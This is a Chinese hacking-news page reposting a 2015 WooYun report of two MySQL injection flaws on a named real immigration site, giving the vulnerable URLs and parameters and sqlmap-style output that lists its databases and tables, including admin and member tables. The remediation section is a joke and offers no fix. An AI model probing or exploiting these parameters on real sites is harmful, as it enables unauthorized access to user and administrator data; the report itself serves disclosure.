记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

易贷网旗下站点2处MySQL注射漏洞

2015-09-08 09:35

classid存在注入

code 区域
http://yimin.edai.com/news.php?classid=3





country存在注入

code 区域
http://yimin.edai.com/immigrate.php?act=home&country=27





跑库

code 区域
available databases [2]:

[*] information_schema

[*] s582798db0



虽然库不多,但是表包含信息

漏洞证明:

code 区域
Database: s582798db0

[26 tables]

+---------------------------------------+

| 3eee_abroad |

| 3eee_admin |

| 3eee_immigrate |

| 3eee_join |

| 3eee_link_class |

| 3eee_link |

| 3eee_member |

| 3eee_message |

| 3eee_news_class |

| 3eee_news_pic |

| 3eee_news |

| 3eee_onepage |

| 3eee_order |

| 3eee_qq_class |

| 3eee_qq |

| 3eee_set |

| mb_admin |

| mb_config |

| mb_float |

| mb_guestbook |

| mb_link |

| mb_linksort |

| mb_member |

| mb_news |

| mb_newssort |

| mb_onepage |

+---------------------------------------+



Database: information_schema

[28 tables]

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| KEY_COLUMN_USAGE |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

修复方案:

看美女

知识来源: www.wooyun.org/bugs/wooyun-2015-0138673

阅读:86734 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“易贷网旗下站点2处MySQL注射漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词